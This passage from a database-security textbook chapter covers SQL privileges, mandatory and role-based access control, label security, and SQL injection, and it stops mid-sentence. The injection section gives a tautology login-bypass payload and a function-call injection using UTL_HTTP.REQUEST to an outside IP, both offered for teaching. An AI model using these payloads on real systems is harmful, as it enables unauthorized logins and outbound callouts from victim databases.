843 Database Security The privileges at the account level apply to the capabilities provided to the account itself and can include the CREATE SCHEMA or CREATE TABLE privilege, to create a schema or base relation; the CREATE VIEW privilege; the ALTER privilege, to apply schema changes such as adding or removing attributes from relations; the DROP privilege, to delete relations or views; the MODIFY privilege, to insert, delete, or update tuples; and the SELECT privilege, to retrieve information from the database by using a SELECT query. Notice that these account privileges apply to the account in general. If a certain account does not have the CREATE TABLE privilege, no rela- tions can be created from that account. Account-level privileges are not defined as part of SQL2; they are left to the DBMS implementers to define. In earlier versions of SQL, a CREATETAB privilege existed to give an account the privilege to create tables (relations). The second level of privileges applies to the relation level, whether they are base relations or virtual (view) relations. These privileges are defined for SQL2. In the following discussion, the term relation may refer either to a base relation or to a view, unless we explicitly specify one or the other. Privileges at the relation level specify for each user the individual relations on which each type of command can be applied. Some privileges also refer to individual columns (attributes) of relations. SQL2 commands provide privileges at the relation and attribute level only. Although this is quite general, it makes it difficult to create accounts with limited privileges. The granting and revoking of privileges generally follow an authorization model for discretionary privileges known as the access matrix model, where the rows of a matrix M represent subjects (users, accounts, programs) and the columns represent objects (relations, records, columns, views, operations). Each position M(i, j) in the matrix represents the types of privileges (read, write, update) that subject i holds on object j. To control the granting and revoking of relation privileges, each relation R in a data- base is assigned an owner account, which is typically the account that was used when the relation was created in the first place. The owner of a relation is given all privileges on that relation. In SQL2, the DBA can assign an owner to a whole schema by creating the schema and associating the appropriate authorization iden- tifier with that schema, using the CREATE SCHEMA command. The owner account holder can pass privileges on any of the owned relations to other users by granting privileges to their accounts. In SQL the following types of privileges can be granted on each individual relation R: ■ SELECT (retrieval or read) privilege on R. Gives the account retrieval privi- lege. In SQL this gives the account the privilege to use the SELECT statement to retrieve tuples from R. ■ Modification privileges on R. This gives the account the capability to mod- ify the tuples of R. In SQL this includes three privileges: UPDATE, DELETE, and INSERT. These correspond to the three SQL commands (see Section 4.4) for modifying a table R. Additionally, both the INSERT and UPDATE privi- leges can specify that only certain attributes of R can be modified by the account. 844 Database Security ■ References privilege on R. This gives the account the capability to reference (or refer to) a relation R when specifying integrity constraints. 
This privilege can also be restricted to specific attributes of R.

Notice that to create a view, the account must have the SELECT privilege on all relations
involved in the view definition in order to specify the query that corresponds to the view.

2.2 Specifying Privileges through the Use of Views

The mechanism of views is an important discretionary authorization mechanism in its own
right. For example, if the owner A of a relation R wants another account B to be able to
retrieve only some fields of R, then A can create a view V of R that includes only those
attributes and then grant SELECT on V to B. The same applies to limiting B to retrieving
only certain tuples of R; a view V′ can be created by defining the view by means of a query
that selects only those tuples from R that A wants to allow B to access. We will illustrate
this discussion with the example given in Section 2.5.

2.3 Revoking of Privileges

In some cases it is desirable to grant a privilege to a user temporarily. For example, the
owner of a relation may want to grant the SELECT privilege to a user for a specific task
and then revoke that privilege once the task is completed. Hence, a mechanism for revoking
privileges is needed. In SQL a REVOKE command is included for the purpose of canceling
privileges. We will see how the REVOKE command is used in the example in Section 2.5.

2.4 Propagation of Privileges Using the GRANT OPTION

Whenever the owner A of a relation R grants a privilege on R to another account B, the
privilege can be given to B with or without the GRANT OPTION. If the GRANT OPTION is given,
this means that B can also grant that privilege on R to other accounts. Suppose that B is
given the GRANT OPTION by A and that B then grants the privilege on R to a third account C,
also with the GRANT OPTION. In this way, privileges on R can propagate to other accounts
without the knowledge of the owner of R. If the owner account A now revokes the privilege
granted to B, all the privileges that B propagated based on that privilege should
automatically be revoked by the system.

It is possible for a user to receive a certain privilege from two or more sources. For
example, A4 may receive a certain UPDATE R privilege from both A2 and A3. In such a case,
if A2 revokes this privilege from A4, A4 will still continue to have the privilege by
virtue of having been granted it from A3. If A3 later revokes the privilege from A4, A4
totally loses the privilege. Hence, a DBMS that allows propagation of privileges must keep
track of how all the privileges were granted so that revoking of privileges can be done
correctly and completely.

2.5 An Example to Illustrate Granting and Revoking of Privileges

Suppose that the DBA creates four accounts—A1, A2, A3, and A4—and wants only A1 to be able
to create base relations. To do this, the DBA must issue the following GRANT command in
SQL:

GRANT CREATETAB TO A1;

The CREATETAB (create table) privilege gives account A1 the capability to create new
database tables (base relations) and is hence an account privilege. This privilege was part
of earlier versions of SQL but is now left to each individual system implementation to
define. In SQL2 the same effect can be accomplished by having the DBA issue a CREATE SCHEMA
command, as follows:

CREATE SCHEMA EXAMPLE AUTHORIZATION A1;

User account A1 can now create tables under the schema called EXAMPLE.
To continue our example, suppose that A1 creates the two base relations EMPLOYEE and
DEPARTMENT shown in Figure 1; A1 is then the owner of these two relations and hence has all
the relation privileges on each of them.

Figure 1: Schemas for the two relations EMPLOYEE and DEPARTMENT.
EMPLOYEE(Name, Ssn, Bdate, Address, Sex, Salary, Dno)
DEPARTMENT(Dname, Dnumber, Mgr_ssn)

Next, suppose that account A1 wants to grant to account A2 the privilege to insert and
delete tuples in both of these relations. However, A1 does not want A2 to be able to
propagate these privileges to additional accounts. A1 can issue the following command:

GRANT INSERT, DELETE ON EMPLOYEE, DEPARTMENT TO A2;

Notice that the owner account A1 of a relation automatically has the GRANT OPTION, allowing
it to grant privileges on the relation to other accounts. However, account A2 cannot grant
INSERT and DELETE privileges on the EMPLOYEE and DEPARTMENT tables because A2 was not given
the GRANT OPTION in the preceding command.

Next, suppose that A1 wants to allow account A3 to retrieve information from either of the
two tables and also to be able to propagate the SELECT privilege to other accounts. A1 can
issue the following command:

GRANT SELECT ON EMPLOYEE, DEPARTMENT TO A3 WITH GRANT OPTION;

The clause WITH GRANT OPTION means that A3 can now propagate the privilege to other
accounts by using GRANT. For example, A3 can grant the SELECT privilege on the EMPLOYEE
relation to A4 by issuing the following command:

GRANT SELECT ON EMPLOYEE TO A4;

Notice that A4 cannot propagate the SELECT privilege to other accounts because the GRANT
OPTION was not given to A4.

Now suppose that A1 decides to revoke the SELECT privilege on the EMPLOYEE relation from
A3; A1 then can issue this command:

REVOKE SELECT ON EMPLOYEE FROM A3;

The DBMS must now revoke the SELECT privilege on EMPLOYEE from A3, and it must also
automatically revoke the SELECT privilege on EMPLOYEE from A4. This is because A3 granted
that privilege to A4, but A3 does not have the privilege any more.

Next, suppose that A1 wants to give back to A3 a limited capability to SELECT from the
EMPLOYEE relation and wants to allow A3 to be able to propagate the privilege. The
limitation is to retrieve only the Name, Bdate, and Address attributes and only for the
tuples with Dno = 5. A1 then can create the following view:

CREATE VIEW A3EMPLOYEE AS
SELECT Name, Bdate, Address
FROM EMPLOYEE
WHERE Dno = 5;

After the view is created, A1 can grant SELECT on the view A3EMPLOYEE to A3 as follows:

GRANT SELECT ON A3EMPLOYEE TO A3 WITH GRANT OPTION;

Finally, suppose that A1 wants to allow A4 to update only the Salary attribute of EMPLOYEE;
A1 can then issue the following command:

GRANT UPDATE ON EMPLOYEE (Salary) TO A4;

The UPDATE and INSERT privileges can specify particular attributes that may be updated or
inserted in a relation. Other privileges (SELECT, DELETE) are not attribute specific,
because this specificity can easily be controlled by creating the appropriate views that
include only the desired attributes and granting the corresponding privileges on the views.
However, because updating views is not always possible, the UPDATE and INSERT privileges
are given the option to specify the particular attributes of a base relation that may be
updated.

2.6 Specifying Limits on Propagation of Privileges

Techniques to limit the propagation of privileges have been developed, although they have
not yet been implemented in most DBMSs and are not a part of SQL.
Limiting horizontal propagation to an integer number i means that an account B given the
GRANT OPTION can grant the privilege to at most i other accounts.

Vertical propagation is more complicated; it limits the depth of the granting of
privileges. Granting a privilege with a vertical propagation of zero is equivalent to
granting the privilege with no GRANT OPTION. If account A grants a privilege to account B
with the vertical propagation set to an integer number j > 0, this means
that the account B has the GRANT OPTION on that privilege, but B can grant the
privilege to other accounts only with a vertical propagation less than j. In effect, ver-
tical propagation limits the sequence of GRANT OPTIONS that can be given from
one account to the next based on a single original grant of the privilege.

We briefly illustrate horizontal and vertical propagation limits—which are not
available currently in SQL or other relational systems—with an example. Suppose
that A1 grants SELECT to A2 on the EMPLOYEE relation with horizontal propaga-
tion equal to 1 and vertical propagation equal to 2. A2 can then grant SELECT to at
most one account because the horizontal propagation limitation is set to 1.
Additionally, A2 cannot grant the privilege to another account except with vertical
propagation set to 0 (no GRANT OPTION) or 1; this is because A2 must reduce the
vertical propagation by at least 1 when passing the privilege to others. In addition,
the horizontal propagation must be less than or equal to the originally granted hor-
izontal propagation. For example, if account A grants a privilege to account B with
the horizontal propagation set to an integer number j > 0, this means that B can
grant the privilege to other accounts only with a horizontal propagation less than or
equal to j. As this example shows, horizontal and vertical propagation techniques are
designed to limit the depth and breadth of propagation of privileges.
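
To make the idea concrete, a purely hypothetical extension of the GRANT syntax (this is an
illustration only; as noted above, no such clause exists in SQL or in current relational
systems) might express the limits used in this example as:

GRANT SELECT ON EMPLOYEE TO A2
    WITH GRANT OPTION (HORIZONTAL PROPAGATION 1, VERTICAL PROPAGATION 2);

A DBMS supporting such limits would have to record, with each grant, the remaining
horizontal count and vertical depth, and check both values whenever A2 issues a further
GRANT based on this privilege.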

3 Mandatory Access Control and Role-Based
Access Control for Multilevel Security

The discretionary access control technique of granting and revoking privileges on
relations has traditionally been the main security mechanism for relational database
systems. This is an all-or-nothing method: A user either has or does not have a cer-
tain privilege. In many applications, an additional security policy is needed that clas-
sifies data and users based on security classes. This approach, known as mandatory
access control (MAC), would typically be combined with the discretionary access
control mechanisms described in Section 2. It is important to note that most com-
mercial DBMSs currently provide mechanisms only for discretionary access con-
trol. However, the need for multilevel security exists in government, military, and
intelligence applications, as well as in many industrial and corporate applications.
Some DBMS vendors—for example, Oracle—have released special versions of their
RDBMSs that incorporate mandatory access control for government use.

Typical security classes are top secret (TS), secret (S), confidential (C), and unclas-
sified (U), where TS is the highest level and U the lowest. Other more complex secu-
rity classification schemes exist, in which the security classes are organized in a
lattice. For simplicity, we will use the system with four security classification levels,
where TS ≥ S ≥ C ≥ U, to illustrate our discussion. The commonly used model for
multilevel security, known as the Bell-LaPadula model, classifies each subject (user,
account, program) and object (relation, tuple, column, view, operation) into one of
the security classifications TS, S, C, or U. We will refer to the clearance (classifica-
tion) of a subject S as class(S) and to the classification of an object O as class(O).
Two restrictions are enforced on data access based on the subject/object classifica-
tions:

1. A subject S is not allowed read access to an object O unless class(S) ≥
class(O). This is known as the simple security property.

2. A subject S is not allowed to write an object O unless class(S) ≤ class(O). This
is known as the star property (or *-property).

The first restriction is intuitive and enforces the obvious rule that no subject can
read an object whose security classification is higher than the subject’s security
clearance. The second restriction is less intuitive. It prohibits a subject from writing
an object at a lower security classification than the subject’s security clearance.
Violation of this rule would allow information to flow from higher to lower classifi-
cations, which violates a basic tenet of multilevel security. For example, a user (sub-
ject) with TS clearance may make a copy of an object with classification TS and then
write it back as a new object with classification U, thus making it visible throughout
the system.

To incorporate multilevel security notions into the relational database model, it is
common to consider attribute values and tuples as data objects. Hence, each attrib-
ute A is associated with a classification attribute C in the schema, and each attrib-
ute value in a tuple is associated with a corresponding security classification. In
addition, in some models, a tuple classification attribute TC is added to the relation
attributes to provide a classification for each tuple as a whole. The model we
describe here is known as the multilevel model, because it allows classifications at
multiple security levels. A multilevel relation schema R with n attributes would be
represented as:

R(A1, C1, A2, C2, …, An, Cn, TC)

where each Ci represents the classification attribute associated with attribute Ai.

The value of the tuple classification attribute TC in each tuple t is the highest of all
attribute classification values Ci within t; it provides a general classification for the
tuple as a whole, whereas each attribute classification Ci provides a finer security
classification for each attribute value within the tuple.
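
As a minimal sketch of how such a schema could be stored, consider a multilevel version of
an EMPLOYEE relation (the table name, column names, and the numeric encoding of the
classification levels are illustrative; real multilevel DBMSs manage classification
attributes internally rather than as ordinary columns):

CREATE TABLE EMPLOYEE_MLS (
    Name              VARCHAR(30),
    Name_C            SMALLINT,       -- classification of Name: 1 = U, 2 = C, 3 = S, 4 = TS
    Salary            DECIMAL(10,2),
    Salary_C          SMALLINT,       -- classification of Salary
    Job_performance   VARCHAR(20),
    Job_performance_C SMALLINT,       -- classification of Job_performance
    TC                SMALLINT        -- tuple classification: highest of the attribute classifications
);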

The apparent key of a multilevel relation is the set of attributes that would have
formed the primary key in a regular (single-level) relation. A multilevel relation will
appear to contain different data to subjects (users) with different clearance levels. In
some cases, it is possible to store a single tuple in the relation at a higher classifica-
tion level and produce the corresponding tuples at a lower-level classification
through a process known as filtering. In other cases, it is necessary to store two or
more tuples at different classification levels with the same value for the apparent key.
This leads to the concept of polyinstantiation,4 where several tuples can have the
same apparent key value but have different attribute values for users at different
clearance levels.

We illustrate these concepts with the simple example of a multilevel relation shown
in Figure 2(a), where we display the classification attribute values next to each
attribute’s value. Assume that the Name attribute is the apparent key, and consider
the query SELECT * FROM EMPLOYEE. A user with security clearance S would see
the same relation shown in Figure 2(a), since all tuple classifications are less than or
equal to S. However, a user with security clearance C would not be allowed to see the
values for Salary of ‘Brown’ and Job_performance of ‘Smith’, since they have higher
classification. The tuples would be filtered to appear as shown in Figure 2(b), with
Salary and Job_performance appearing as null. For a user with security clearance U,
the filtering allows only the Name attribute of ‘Smith’ to appear, with all the other
attributes appearing as null (Figure 2(c)). Thus, filtering introduces null values for
attribute values whose security classification is higher than the user’s security
clearance.

Figure 2: A multilevel relation to illustrate multilevel security.

(a) The original EMPLOYEE tuples:

Name      Salary     Job_performance   TC
Smith U   40000 C    Fair S            S
Brown C   80000 S    Good C            S

(b) Appearance of EMPLOYEE after filtering for classification C users:

Name      Salary     Job_performance   TC
Smith U   40000 C    NULL C            C
Brown C   NULL C     Good C            C

(c) Appearance of EMPLOYEE after filtering for classification U users:

Name      Salary     Job_performance   TC
Smith U   NULL U     NULL U            U

(d) Polyinstantiation of the Smith tuple:

Name      Salary     Job_performance   TC
Smith U   40000 C    Fair S            S
Smith U   40000 C    Excellent C       C
Brown C   80000 S    Good C            S

4This is similar to the notion of having multiple versions in the database that represent
the same real-world object.

In general, the entity integrity rule for multilevel relations states that all attributes
that are members of the apparent key must not be null and must have the same
security classification within each individual tuple. Additionally, all other attribute
values in the tuple must have a security classification greater than or equal to that of
the apparent key. This constraint ensures that a user can see the key if the user is
permitted to see any part of the tuple. Other integrity rules, called null integrity
and interinstance integrity, informally ensure that if a tuple value at some security
level can be filtered (derived) from a higher-classified tuple, then it is sufficient to
store the higher-classified tuple in the multilevel relation.
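
A minimal SQL sketch of filtering, using the illustrative EMPLOYEE_MLS table introduced
above (with numeric classification columns Name_C, Salary_C, and Job_performance_C, where
1 = U and 2 = C), could derive the instance seen by classification C users, as in
Figure 2(b); the sketch ignores polyinstantiation and the recomputation of TC:

CREATE VIEW EMPLOYEE_C AS
SELECT Name,
       CASE WHEN Salary_C          <= 2 THEN Salary          ELSE NULL END AS Salary,
       CASE WHEN Job_performance_C <= 2 THEN Job_performance ELSE NULL END AS Job_performance
FROM   EMPLOYEE_MLS
WHERE  Name_C <= 2;   -- a tuple is invisible when even its apparent key is classified above C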

To illustrate polyinstantiation further, suppose that a user with security clearance C
tries to update the value of Job_performance of ‘Smith’ in Figure 2 to ‘Excellent’; this
corresponds to the following SQL update being submitted by that user:

UPDATE EMPLOYEE
SET Job_performance = ‘Excellent’
WHERE Name = ‘Smith’;

Since the view provided to users with security clearance C (see Figure 2(b)) permits
such an update, the system should not reject it; otherwise, the user could infer that
some nonnull value exists for the Job_performance attribute of ‘Smith’ rather than
the null value that appears. This is an example of inferring information through
what is known as a covert channel, which should not be permitted in highly secure
systems (see Section 6.1). However, the user should not be allowed to overwrite the
existing value of Job_performance at the higher classification level. The solution is to
create a polyinstantiation for the ‘Smith’ tuple at the lower classification level C, as
shown in Figure 2(d). This is necessary since the new tuple cannot be filtered from
the existing tuple at classification S.

The basic update operations of the relational model (INSERT, DELETE, UPDATE)
must be modified to handle this and similar situations, but this aspect of the prob-
lem is outside the scope of our presentation. We refer the interested reader to the
Selected Bibliography at the end of this chapter for further details.

3.1 Comparing Discretionary Access Control
and Mandatory Access Control

Discretionary access control (DAC) policies are characterized by a high degree of
flexibility, which makes them suitable for a large variety of application domains.
The main drawback of DAC models is their vulnerability to malicious attacks, such
as Trojan horses embedded in application programs. The reason is that discre-
tionary authorization models do not impose any control on how information is
propagated and used once it has been accessed by users authorized to do so. By con-
trast, mandatory policies ensure a high degree of protection—in a way, they prevent
any illegal flow of information. Therefore, they are suitable for military and high
security types of applications, which require a higher degree of protection.
However, mandatory policies have the drawback of being too rigid in that they
require a strict classification of subjects and objects into security levels, and there-
fore they are applicable to few environments. In many practical situations, discre-
tionary policies are preferred because they offer a better tradeoff between security
and applicability.

3.2 Role-Based Access Control
Role-based access control (RBAC) emerged rapidly in the 1990s as a proven tech-
nology for managing and enforcing security in large-scale enterprise-wide systems.
Its basic notion is that privileges and other permissions are associated with organi-
zational roles, rather than individual users. Individual users are then assigned to
appropriate roles. Roles can be created using the CREATE ROLE and DESTROY
ROLE commands. The GRANT and REVOKE commands discussed in Section 2 can
then be used to assign and revoke privileges from roles, as well as for individual
users when needed. For example, a company may have roles such as sales account
manager, purchasing agent, mailroom clerk, department manager, and so on.
Multiple individuals can be assigned to each role. Security privileges that are com-
mon to a role are granted to the role name, and any individual assigned to this role
would automatically have those privileges granted.
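
As a brief sketch using the commands just mentioned (the role, table, and account names are
illustrative):

CREATE ROLE sales_account_manager;
GRANT SELECT, UPDATE ON CUSTOMER_ACCOUNTS TO sales_account_manager;
GRANT sales_account_manager TO A2, A3;   -- both accounts acquire the role's privileges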

RBAC can be used with traditional discretionary and mandatory access controls; it
ensures that only authorized users in their specified roles are given access to certain
data or resources. Users create sessions during which they may activate a subset of
roles to which they belong. Each session can be assigned to several roles, but it maps
to one user or a single subject only. Many DBMSs have allowed the concept of roles,
where privileges can be assigned to roles.

Separation of duties is another important requirement in various commercial
DBMSs. It is needed to prevent one user from doing work that requires the involve-
ment of two or more people, thus preventing collusion. One method in which sepa-
ration of duties can be successfully implemented is with mutual exclusion of roles.
Two roles are said to be mutually exclusive if both the roles cannot be used simul-
taneously by the user. Mutual exclusion of roles can be categorized into two types,
namely authorization time exclusion (static) and runtime exclusion (dynamic). In
authorization time exclusion, two roles that have been specified as mutually exclu-
sive cannot be part of a user’s authorization at the same time. In runtime exclusion,
both these roles can be authorized to one user but cannot be activated by the user at
the same time. Another variation in mutual exclusion of roles is that of complete
and partial exclusion.
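
One way authorization-time (static) exclusion could be checked is sketched below; the
catalog tables USER_ROLES(User_id, Role_name) and EXCLUSIVE_ROLES(Role_a, Role_b) and the
parameters :candidate_user and :new_role are illustrative:

SELECT COUNT(*)
FROM   USER_ROLES ur
JOIN   EXCLUSIVE_ROLES ex
       ON (ur.Role_name = ex.Role_a AND :new_role = ex.Role_b)
       OR (ur.Role_name = ex.Role_b AND :new_role = ex.Role_a)
WHERE  ur.User_id = :candidate_user;
-- A nonzero count means the requested role is mutually exclusive with a role the
-- user already holds, so the assignment should be refused.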

The role hierarchy in RBAC is a natural way to organize roles to reflect the organi-
zation’s lines of authority and responsibility. By convention, junior roles at the
bottom are connected to progressively senior roles as one moves up the hierarchy.
The hierarchic diagrams are partial orders, so they are reflexive, transitive, and
antisymmetric. In other words, if a user has one role, the user automatically has
roles lower in the hierarchy. Defining a role hierarchy involves choosing the type of
hierarchy and the roles, and then implementing the hierarchy by granting roles to
other roles. Role hierarchy can be implemented in the following manner:

GRANT ROLE full_time TO employee_type1
GRANT ROLE intern TO employee_type2

The above are examples of granting the roles full_time and intern to two types of
employees.

Another issue related to security is identity management. Identity refers to a unique
name of an individual person. Since the legal names of persons are not necessarily
unique, the identity of a person must include sufficient additional information to
make the complete name unique. Authorizing this identity and managing the
schema of these identities is called Identity Management. Identity Management
addresses how organizations can effectively authenticate people and manage their
access to confidential information. It has become more visible as a business require-
ment across all industries affecting organizations of all sizes. Identity Management
administrators constantly need to satisfy application owners while keeping expendi-
tures under control and increasing IT efficiency.

Another important consideration in RBAC systems is the possible temporal con-
straints that may exist on roles, such as the time and duration of role activations,
and timed triggering of a role by an activation of another role. Using an RBAC
model is a highly desirable goal for addressing the key security requirements of
Web-based applications. Roles can be assigned to workflow tasks so that a user with
any of the roles related to a task may be authorized to execute it and may play a cer-
tain role only for a certain duration.

RBAC models have several desirable features, such as flexibility, policy neutrality,
better support for security management and administration, and other aspects that
make them attractive candidates for developing secure Web-based applications.
These features are lacking in DAC and MAC models. In addition, RBAC models
include the capabilities available in traditional DAC and MAC policies.
Furthermore, an RBAC model provides mechanisms for addressing the security
issues related to the execution of tasks and workflows, and for specifying user-
defined and organization-specific policies. Easier deployment over the Internet has
been another reason for the success of RBAC models.

3.3 Label-Based Security and Row-Level Access Control
Many commercial DBMSs currently use the concept of row-level access control,
where sophisticated access control rules can be implemented by considering the
data row by row. In row-level access control, each data row is given a label, which is
used to store information about data sensitivity. Row-level access control provides
finer granularity of data security by allowing the permissions to be set for each row
and not just for the table or column. Initially the user is given a default session label
by the database administrator. Levels correspond to a hierarchy of data sensitivity to
exposure or corruption, with the goal of maintaining privacy or security.
Labels are used to prevent unauthorized users from viewing or altering certain data.
A user having a low authorization level, usually represented by a low number, is
denied access to data having a higher-level number. If no such label is given to a row,
a row label is automatically assigned to it depending upon the user’s session label.

A policy defined by an administrator is called a Label Security policy. Whenever
data affected by the policy is accessed or queried through an application, the policy
is automatically invoked. When a policy is implemented, a new column is added to
each row in the schema. The added column contains the label for each row that
reflects the sensitivity of the row as per the policy. Similar to MAC, where each user
has a security clearance, each user has an identity in label-based security. This user’s
identity is compared to the label assigned to each row to determine whether the user
has access to view the contents of that row. However, the user can write the label
value himself, within certain restrictions and guidelines for that specific row. This
label can be set to a value that is between the user’s current session label and the
user’s minimum level. The DBA has the privilege to set an initial default row label.

The Label Security requirements are applied on top of the DAC requirements for
each user. Hence, the user must satisfy the DAC requirements and then the label
security requirements to access a row. The DAC requirements make sure that the
user is legally authorized to carry on that operation on the schema. In most applica-
tions, only some of the tables need label-based security. For the majority of the
application tables, the protection provided by DAC is sufficient.

Security policies are generally created by managers and human resources personnel.
The policies are high-level, technology neutral, and relate to risks. Policies are a
result of management instructions to specify organizational procedures, guiding
principles, and courses of action that are considered to be expedient, prudent, or
advantageous. Policies are typically accompanied by a definition of penalties and
countermeasures if the policy is transgressed. These policies are then interpreted
and converted to a set of label-oriented policies by the Label Security administra-
tor, who defines the security labels for data and authorizations for users; these labels
and authorizations govern access to specified protected objects.

Suppose a user has SELECT privileges on a table. When the user executes a SELECT
statement on that table, Label Security will automatically evaluate each row
returned by the query to determine whether the user has rights to view the data. For
example, if the user has a sensitivity of 20, then the user can view all rows having a
security level of 20 or lower. The level determines the sensitivity of the information
contained in a row; the more sensitive the row, the higher its security label value.
Such Label Security can be configured to perform security checks on UPDATE,
DELETE, and INSERT statements as well.
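
As a generic sketch of the mechanism (commercial products such as Oracle Label Security
supply their own policy administration interfaces, which are not shown here; the ORDERS
table, the ROW_LABEL column, and the SESSION_LABEL() function below are illustrative
stand-ins), row-level filtering amounts to comparing the label stored with each row against
the user's session label:

CREATE VIEW ORDERS_VISIBLE AS
SELECT *
FROM   ORDERS                          -- illustrative application table
WHERE  ROW_LABEL <= SESSION_LABEL();   -- SESSION_LABEL() stands for the user's session label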

3.4 XML Access Control
With the worldwide use of XML in commercial and scientific applications, efforts
are under way to develop security standards. Among these efforts are digital
signatures and encryption standards for XML. The XML Signature Syntax and
Processing specification describes an XML syntax for representing the associations
between cryptographic signatures and XML documents or other electronic
resources. The specification also includes procedures for computing and verifying
XML signatures. An XML digital signature differs from other protocols for message
signing, such as PGP (Pretty Good Privacy—a confidentiality and authentication
service that can be used for electronic mail and file storage application), in its sup-
port for signing only specific portions of the XML tree rather than the complete
document. Additionally, the XML signature specification defines mechanisms for
countersigning and transformations—so-called canonicalization to ensure that two
instances of the same text produce the same digest for signing even if their represen-
tations differ slightly, for example, in typographic white space.

The XML Encryption Syntax and Processing specification defines XML vocabulary
and processing rules for protecting confidentiality of XML documents in whole or
in part and of non-XML data as well. The encrypted content and additional pro-
cessing information for the recipient are represented in well-formed XML so that
the result can be further processed using XML tools. In contrast to other commonly
used technologies for confidentiality such as SSL (Secure Sockets Layer—a leading
Internet security protocol), and virtual private networks, XML encryption also
applies to parts of documents and to documents in persistent storage.

3.5 Access Control Policies for E-Commerce and the Web
Electronic commerce (e-commerce) environments are characterized by transactions that are
carried out electronically. They require elaborate access control policies
that go beyond traditional DBMSs. In conventional database environments, access
control is usually performed using a set of authorizations stated by security officers
or users according to some security policies. Such a simple paradigm is not
well suited for a dynamic environment like e-commerce. Furthermore, in an
e-commerce environment the resources to be protected are not only traditional data
but also knowledge and experience. Such peculiarities call for more flexibility in
specifying access control policies. The access control mechanism must be flexible
enough to support a wide spectrum of heterogeneous protection objects.

A second related requirement is the support for content-based access control.
Content-based access control allows one to express access control policies that take
the protection object content into account. In order to support content-based access
control, access control policies must allow inclusion of conditions based on the
object content.

A third requirement is related to the heterogeneity of subjects, which requires access
control policies based on user characteristics and qualifications rather than on spe-
cific and individual characteristics (for example, user IDs). A possible solution, to
better take into account user profiles in the formulation of access control policies, is
to support the notion of credentials. A credential is a set of properties concerning a
user that are relevant for security purposes (for example, age or position or role
within an organization). For instance, by using credentials, one can simply formu-
late policies such as Only permanent staff with five or more years of service can access
documents related to the internals of the system.

XML is expected to play a key role in access control for
e-commerce applications5 because XML is becoming the common representation
language for document interchange over the Web, and is also becoming the lan-
guage for e-commerce. Thus, on the one hand there is the need to make XML repre-
sentations secure, by providing access control mechanisms specifically tailored to
the protection of XML documents. On the other hand, access control information
(that is, access control policies and user credentials) can be expressed using XML
itself. The Directory Services Markup Language (DSML) is a representation of
directory service information in XML syntax. It provides a foundation for a stan-
dard for communicating with the directory services that will be responsible for pro-
viding and authenticating user credentials. The uniform presentation of both
protection objects and access control policies can be applied to policies and creden-
tials themselves. For instance, some credential properties (such as the user name)
may be accessible to everyone, whereas other properties may be visible only to a
restricted class of users. Additionally, the use of an XML-based language for specify-
ing credentials and access control policies facilitates secure credential submission
and export of access control policies.

4 SQL Injection
SQL Injection is one of the most common threats to a database system. We will dis-
cuss it in detail later in this section. Some of the other attacks on databases that are
quite frequent are:

■ Unauthorized privilege escalation. This attack is characterized by an indi-
vidual attempting to elevate his or her privilege by attacking vulnerable
points in the database systems.

■ Privilege abuse. While the previous attack is done by an unauthorized user,
this attack is performed by a privileged user. For example, an administrator
who is allowed to change student information can use this privilege to
update student grades without the instructor’s permission.

■ Denial of service. A Denial of Service (DOS) attack is an attempt to make
resources unavailable to their intended users. It is a general attack category in
which access to network applications or data is denied to intended users by
overflowing the buffer or consuming resources.

■ Weak Authentication. If the user authentication scheme is weak, an attacker
can impersonate the identity of a legitimate user by obtaining their login
credentials.

5See Thuraisingham et al. (2001).

4.1 SQL Injection Methods
Web programs and applications that access a database can send commands and data
to the database, as well as display data retrieved from the database through the Web
browser. In an SQL Injection attack, the attacker injects a string input through the
application, which changes or manipulates the SQL statement to the attacker’s
advantage. An SQL Injection attack can harm the database in various ways, such as
unauthorized manipulation of the database, or retrieval of sensitive data. It can also
be used to execute system level commands that may cause the system to deny serv-
ice to the application. This section describes types of injection attacks.

SQL Manipulation. A manipulation attack, which is the most common type of
injection attack, changes an SQL command in the application—for example, by
adding conditions to the WHERE-clause of a query, or by expanding a query with
additional query components using set operations such as UNION, INTERSECT, or
MINUS. Other types of manipulation attacks are also possible. A typical manipula-
tion attack occurs during database login. For example, suppose that a simplistic
authentication procedure issues the following query and checks to see if any rows
were returned:

SELECT * FROM users WHERE username = ‘jake’ and PASSWORD =
‘jakespasswd’.

The attacker can try to change (or manipulate) the SQL statement, by changing it as
follows:

SELECT * FROM users WHERE username = ‘jake’ and (PASSWORD =
‘jakespasswd’ or ‘x’ = ‘x’)

As a result, the attacker who knows that ‘jake’ is a valid login of some user is able to
log into the database system as ‘jake’ without knowing his password and is able to do
everything that ‘jake’ may be authorized to do to the database system.
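
To see where the extra condition comes from, note that a vulnerable application typically
builds the statement by pasting the raw input into a template; the following is an
illustrative sketch of that deliberately insecure pattern:

-- Application template, with user input spliced in between the quotes:
--   SELECT * FROM users WHERE username = '<input 1>' and PASSWORD = '<input 2>';
-- Attacker's input 1:  jake
-- Attacker's input 2:  jakespasswd' or 'x' = 'x
-- The resulting WHERE clause is satisfied regardless of the real password, so the
-- query returns rows and the login check succeeds.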

Code Injection. This type of attack attempts to add additional SQL statements or
commands to the existing SQL statement by exploiting a computer bug, which is
caused by processing invalid data. The attacker can inject or introduce code into a
computer program to change the course of execution. Code injection is a popular
technique for system hacking or cracking to gain information.

Function Call Injection. In this kind of attack, a database function or operating
system function call is inserted into a vulnerable SQL statement to manipulate the
data or make a privileged system call. For example, it is possible to exploit a function
that performs some aspect related to network communication. In addition, func-
tions that are contained in a customized database package, or any custom database
function, can be executed as part of an SQL query. In particular, dynamically cre-
ated SQL queries can be exploited since they are constructed at run time.

For example, the dual table is used in the FROM clause of SQL in Oracle when a user
needs to run SQL that does not logically have a table name. To get today’s date, we
can use:

SELECT SYSDATE FROM dual;

The following example demonstrates that even the simplest SQL statements can be
vulnerable.

SELECT TRANSLATE (‘user input’, ‘from_string’, ‘to_string’) FROM dual;

Here, TRANSLATE is used to replace a string of characters with another string of
characters. The TRANSLATE function above will replace the characters of the
‘from_string’ with the characters in the ‘to_string’ one by one. This means that the f
will be replaced with the t, the r with the o, the o with the _, and so on.

This type of SQL statement can be subjected to a function injection attack. Consider
the following example:

SELECT TRANSLATE ('' || UTL_HTTP.REQUEST ('http://129.107.2.1/') || '',
'98765432', '9876') FROM dual;

The user can input the string ('' || UTL_HTTP.REQUEST ('http://129.107.2.1/')
|| ''), where || is the concatenate operator, thus requesting a page from a Web server.
UTL_HTTP makes Hypertext Transfer Protocol (HTTP) callouts from SQL. The
REQUEST object takes a URL (‘http://129.107.2.1/’ in this example) as a parameter,
contacts that site, and returns the data (typically HTML) obtained from that site.
The attacker could manipulate the string he inputs, as well as the URL, to include
other functions and do other illegal operations. We just used a dummy example to
